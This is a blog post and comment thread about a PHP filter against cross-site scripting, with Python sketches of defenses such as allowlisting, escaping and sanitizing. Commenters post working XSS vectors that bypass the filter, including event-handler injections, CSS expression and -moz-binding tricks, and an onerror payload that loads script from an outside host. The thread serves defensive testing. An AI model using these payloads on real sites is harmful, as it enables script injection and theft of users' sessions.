XSS – How we try to prevent it.

Cross-site scripting (XSS) is an increasing problem for many web apps, and there’s an ongoing discussion about it on the phpsec mailing list.

We have been trying to prevent it for some time with different approaches. For example, we allow only certain tags in comments (with the help of strip_tags()), we don’t make links clickable, and we use tidy for further cleanup. We also wrote a little method that tries to clean out the most common exploit attempts with some preg magic. But I doubt that we catch every possible exploit…

Therefore I’m asking my readers whether they know of more exploits that would help improve this method. The source code of the method can be found here, and you can test it at http://php5.bitflux.org/xss.php. If you somehow manage to make an alert box show up (with or without a click), you have succeeded; please report it to me so we can add further checks to the method. Please mail it to me: it will most certainly not work in the comments (or only the exploit will work, but I’ll be quick to remove such comments ;) )

The test script does not use tidy, strip_tags or anything other than the method mentioned above. Of course, feel free to use it for your own projects if you like.

Happy Hacking ;)

Update: Some weaknesses have already been found, and I’ve updated the method. I’ll blog about the improvements later. Also, the method doesn’t deal with CSS hacks, so yes, you can change the color of the site with it ;) I’m only interested in “real” XSS exploits, meaning ones where you can somehow inject JavaScript.

Update II: I wrote a little wiki article about what the script does and what common exploits are.

Your script is a good thing, but I think it is the wrong way of thinking about security.

Hackers put a lot of energy into finding new ways to break into your system. So don’t try to work out every possible way to attack your system and filter them out. However hard you try, there will always be a method left that you didn’t think of.

So try a different approach and think the positive way: accept only a small set of possibilities (some very common characters that you expect a normal user to use) and check very carefully that they can’t harm your system. Good error handling is also needed. Give users a way to contact you when an input is not accepted by the system, so that if you didn’t think of a needed input, you can add it to your system afterwards.
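A minimal Python sketch of this positive (allowlist) approach, assuming plain-text comments. The permitted character set is purely illustrative, and the hypothetical accept_comment() rejects input instead of trying to repair it, so the caller can show an error and point the user to a way to get in touch:

```python
import re

# Illustrative allowlist (an assumption): ASCII letters, digits, whitespace and a
# few punctuation marks. <, >, =, quotes and & are deliberately absent, so the
# accepted text cannot form markup.
ALLOWED_TEXT = re.compile(r"[A-Za-z0-9\s.,!?\-]*")


def accept_comment(text: str) -> bool:
    """Return True only if every character of text is on the allowlist (hypothetical helper)."""
    return ALLOWED_TEXT.fullmatch(text) is not None


for comment in ["Nice post, thanks!", '<b onmouseover="alert(1)">hi</b>']:
    if accept_comment(comment):
        print("accepted:", comment)
    else:
        # Reject instead of "cleaning", and point the user to a way to report it.
        print("rejected: please contact us if this input should be allowed")
```

Anything outside the set, including non-ASCII letters such as ä, is rejected. That is where the feedback channel comes in: the set can be widened once a legitimate need shows up.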

Leo: Thanks for your input. This cleaning is just one part of the whole process. Later on I remove every tag that is not allowed (whitelisted, not blacklisted), for example.

But yes, your approach is certainly a good one; one does not exclude the other ;)

Your tool is far from ideal.

My first try was successful: test

You can see my tool at http://pixel-apes.com/safehtml =)


First try was:

<b style="color:red;"onmouseover="alert(1)">test</b>

kukutz: I fixed that problem. I had a look at your tool, and it looks nice. I’ll take a closer look later.

And I don’t claim that my tool is perfect. It just tries to prevent some basic XSS attacks. But I will certainly improve it.

Ah, and your first attempt didn’t succeed here: we do allow some HTML tags, but we also run tidy before passing the input to the cleaning method. Tidy added a space between the attributes, which the cleaning method then matched correctly.

I would suggest looking at _cleanHTML() in http://cvs.horde.org/co.php/framework/MIME/MIME/Viewer/html.php
This method has evolved over several years, and since it is the HTML filter used in IMP, you can be sure that people have tried to break it many times. Of course they succeeded a few times, which led to improved versions.

Hi chregu,

I wrote twe (twe whitelist enforcer) to protect my applications.

(License: lgpl)

I would be glad to get some feedback.

Should I use htmlentities() with this function? Before or after?

It seems pretty bulletproof for now. I couldn’t get anything from:

to work on it. Good work!


Your script is “cleaning” the word “only” wherever it appears in the HTML. I tried the following in your test page, a simple HTML comment, and it was “cleaned” incorrectly (I hope this works). Try inserting it into your test page and you’ll see what I mean:

If you copy any of my stuff, please acknowledge me in your profile; it’s only fair.

I’ve tried

It works in IE and your script doesn’t remove this!

Sorry, my tag seems to have been auto-deleted. It looks like this:
{IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"}
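According to the comment this works in IE: the CSS comment splits the keyword, so a filter searching for the literal text expression( never sees it. A minimal Python sketch with a hypothetical style_has_expression() (not the method from the post) removes CSS comments before matching. It still ignores CSS escapes such as \65, so it is only one check among several:

```python
import re

# Non-greedy, so each /* ... */ comment is removed separately.
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
CSS_EXPRESSION = re.compile(r"expression\s*\(", re.IGNORECASE)


def style_has_expression(style: str) -> bool:
    """Detect IE's expression() after stripping CSS comments (hypothetical helper)."""
    without_comments = CSS_COMMENT.sub("", style)
    return CSS_EXPRESSION.search(without_comments) is not None


vector = "xss:expr/*XSS*/ession(alert('XSS'))"
print(CSS_EXPRESSION.search(vector) is None)  # the naive check finds nothing
print(style_has_expression(vector))           # the comment-aware check does
```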

Mine didn’t work.

Did you try it in IE?

I got in with:

onmouseover="alert('Javascript is executed');">text

Gah, I’ve e-mailed it to you anyway :)

This simple script works in Firefox…
I’m using the hex representation of the hex representation of the j in javascript.
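The exact vector did not survive in the comment. Presumably it relies on the j being entity-encoded, possibly more than once, so a filter that matches the literal word javascript, or decodes fewer times than it should, misses it. A conservative Python sketch, assuming the check runs on an attribute value such as an href: keep applying html.unescape() until the value stops changing (capped at a few rounds), drop whitespace and control characters, and only then look for the javascript: scheme. Both helper names are hypothetical:

```python
import html


def decode_entities_fully(value: str, max_rounds: int = 5) -> str:
    """Apply html.unescape() repeatedly until the value stops changing."""
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_javascript_url(value: str) -> bool:
    """Hypothetical check for a javascript: URL hidden behind (nested) entities."""
    decoded = decode_entities_fully(value)
    # Drop whitespace and control characters; browsers strip tabs and newlines
    # from URLs, so "java\tscript:" must be treated like "javascript:".
    compact = "".join(ch for ch in decoded if not ch.isspace() and ch.isprintable())
    return compact.lower().startswith("javascript:")


print(is_javascript_url("&#x6A;avascript:alert(1)"))       # encoded once
print(is_javascript_url("&#x26;#x6A;avascript:alert(1)"))  # encoded twice
print(is_javascript_url("http://example.com/"))
```

Decoding more often than the browser makes the check stricter, never looser, which is the safe direction for a filter.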


I got it with this:

Put < at both the beginning and the end!
body onload=alert('xxs!!!')

Once again, and once and for all: the script is not perfect and you shouldn’t use it as your only line of defence…
Use it together with tidy, for example.

{body foo="onLoad"}" onLoad="alert(1);"}

I would prefer htmlspecialchars() in security-sensitive applications if formatting isn’t really necessary.

I don’t understand why htmlentities($var, ENT_QUOTES); is not used. XSS isn’t exactly the hardest thing to get rid of, and it shouldn’t take some super-extensive script to solve. Going from JS to CSS to HTML to XML and filtering function by function is way too difficult, and you’re bound to miss something. A simple htmlentities() call would have solved every single problem with every piece of code that has exploited your script so far. Nothing can function in the middle of a line of code by itself, so kill the beginning and the end generically and be done with the whole situation.
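For readers outside PHP, the closest Python counterpart of htmlspecialchars($var, ENT_QUOTES) is the standard library’s html.escape(text, quote=True), which encodes &, <, >, " and '. A minimal sketch with a hypothetical render_comment(), assuming the comment ends up in element content (escaping alone does not make a value safe inside a script block or as a URL):

```python
import html


def render_comment(text: str) -> str:
    """Wrap user text in a paragraph with all markup characters escaped (hypothetical helper)."""
    # quote=True also escapes " and ', which matters when the same escaping
    # is reused for quoted attribute values.
    return "<p>" + html.escape(text, quote=True) + "</p>"


print(render_comment('<b onmouseover="alert(1)">hi</b>'))
# <p>&lt;b onmouseover=&quot;alert(1)&quot;&gt;hi&lt;/b&gt;</p>
```

The trade-off is that all formatting is lost along with the attack.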

biz: If for some reason you want to allow HTML as input, you have to filter it somehow (and there are certainly reasons for that).

But if you don’t need/want HTML, then yes, please use htmlentities/htmlspecialchars…

Your wiki seems to have been down for a few days now. Also, Google doesn’t seem to have a cache of the page, and neither does archive.org. Did you take it down for good? Note that the error I’m getting is 403, not 404.

It’s here:


and the redirect works again as well :)


This works like a charm… try php-ids.org ;)


Sorry, here’s the correct vector:


(It needs to be URL-decoded; I couldn’t post it otherwise.)

Another one (Firefox 1.x to 2.x):


So, it may work with the filter alone (your code isn’t really readable anymore), but it doesn’t seem to work here together with tidy. Or am I missing something?

I have always said that this script should not be your only line of defense, but should be used together with an HTML cleaner like tidy.

PS: The XBL one does indeed work without tidy, but it should be easy to filter out. The second one, the “onerror” case, I really can’t reproduce.


“your code is not really readable anymore”: we’re dealing with URL-encoded code here, so where is it not readable?

It’s pretty easy to reproduce once you know that you can attach any attribute to any tag with slashes and other special characters, not only with spaces. Like <tag/attribute=

"><img/onerror=a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a); src=1>
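The same trick is behind the earlier "onmouseover= vector: an event-handler check that expects whitespace before on…= misses both /onerror= and "onmouseover=. A minimal Python sketch with hypothetical pattern names and a shortened payload, comparing a whitespace-only separator with one that also accepts / and quote characters. It is still a blacklist, so it narrows the gap rather than closing it:

```python
import re

# Only whitespace may precede the attribute name: the assumption these vectors exploit.
NAIVE_HANDLER = re.compile(r"\s(on\w+)\s*=", re.IGNORECASE)
# Also treat "/" and quote characters as attribute separators.
BROADER_HANDLER = re.compile(r"""[\s/"'](on\w+)\s*=""", re.IGNORECASE)

vectors = [
    '"><img/onerror=alert(1) src=1>',
    '<b style="color:red;"onmouseover="alert(1)">test</b>',
]

for v in vectors:
    naive = NAIVE_HANDLER.search(v)
    broad = BROADER_HANDLER.search(v)
    # naive finds nothing; the broader pattern reports the handler name
    print(naive is None, broad.group(1) if broad else None)
```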


And never forget the non-alpha-non-digit issues when dealing with XSS seriously…


P.S.: The email notification doesn’t work

Yes, I managed to read your code :)
I added a -moz-binding filter to the cleaning code, but I still stand by my statement: do not use this as your only line of defense. Together with tidy, for example, a lot of those injection vectors are eliminated in the first place, especially the malformed ones.

Here’s another beauty:


.. I CAN REALLY PUT ANYTHING BETWEEN THE LINE BREAKS, $&§&!… style=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>XSS</h1>

Shall we continue this talk via mail?

Look, I believe you that you can find many, many more examples; I never said that it’s 100% bulletproof without tidy. If you find something that works together with tidy, I’m more than happy to fix it. Here’s the test site for you, where all output goes through tidy (to make it easier for you): http://php5.bitflux.org/xsstidy.php

But of course I’m still interested in improving the script, and I value any input; maybe I will try to fix the stuff you found. But the regexes get bigger and bigger for things that could easily be cleaned in other ways…

Tidy causes big problems because it allows data URLs. Take base64-encoded JS, wrap it in a data URL, place it in an image source, open the page in IE6, and the script will be executed.
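Whatever cleaner is used, a common counter-measure is to allowlist URL schemes in src and href values instead of trying to recognize bad ones. A minimal Python sketch with a hypothetical is_safe_url(); the allowed schemes are an assumption, and the value is entity-decoded first because the browser decodes attribute values before resolving the URL:

```python
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumption: what a comment form needs


def is_safe_url(url: str) -> bool:
    """Allow relative URLs and allowlisted schemes only (hypothetical helper)."""
    # Decode entities and drop non-printable characters such as tabs and
    # newlines, which browsers ignore inside URLs.
    candidate = "".join(ch for ch in html.unescape(url).strip() if ch.isprintable())
    scheme = urlsplit(candidate).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


for url in ["https://example.com/a.png", "/img/a.png",
            "data:image/svg+xml;base64,PHN2Zz4=", "java\tscript:alert(1)"]:
    print(repr(url), is_safe_url(url))
```

Rejecting data: outright is the simple choice here; allowing it only for specific image types would need a separate, stricter check.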

Btw, did you try HTML Purifier? In my opinion this solution IS bulletproof, because its filtering is far more thorough than tidy’s approach. It uses a tokenizer/lexer and validates the input against a whitelist: the DTD.
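HTML Purifier itself is a PHP library; the Python sketch below only illustrates the general tokenize-and-allowlist idea with the standard library’s html.parser.HTMLParser. The input is parsed into tags and text, and the output is rebuilt from allowlisted tags only, with all attributes dropped and text re-escaped. The tag list and class name are assumptions, and unlike a DTD-based validator it does not balance unclosed tags:

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}  # assumption; no attributes allowed
DROP_CONTENT = {"script", "style"}                    # elements whose text is discarded


class AllowlistSanitizer(HTMLParser):
    """Rebuild markup from allowlisted tags and escaped text (hypothetical class)."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropping = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.dropping += 1
        elif tag in ALLOWED_TAGS and not self.dropping:
            self.out.append(f"<{tag}>")  # every attribute (onclick, style, ...) is discarded

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.dropping = max(0, self.dropping - 1)
        elif tag in ALLOWED_TAGS and tag != "br" and not self.dropping:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data))  # re-escaped, so decoded entities cannot form tags
    # Comments, doctypes and processing instructions use the default no-op handlers.


def sanitize(markup: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


print(sanitize('<p onclick="alert(1)">Hi <b>there</b></p><script>alert(2)</script>'))
# <p>Hi <b>there</b></p>
```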


I tried HTML Purifier for a webmail project. It’s easy to use and the most bulletproof filter I have found so far. It also does a decent (not perfect) job of preserving the original layout. The downside is its speed. For complete HTML documents (~10 KB), HTML Purifier added 1000 to 2000 ms of processing time, and this was under perfect conditions (dedicated server, opcode caching, single user). Compared to the original 50 to 100 ms, this was huge.
IMHO it could still do a *very* good job for small amounts of data.

Sorry, the line was erased. Look for “Double open angle brackets” on http://ha.ckers.org/xss.html

It works in Firefox 2.

Great script otherwise, keep up the good work!

<html><script>alert('hello')</script><h1>HACKING TEST!</h1></html>

funny guy…

htmLawed (bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php) is a new PHP script, similar to HTML Purifier, that can be used to make HTML in input text more secure and standards-compliant, and to administratively restrict HTML elements, attributes, etc. It is a single-file script of ~45 KB with low memory usage, and is highly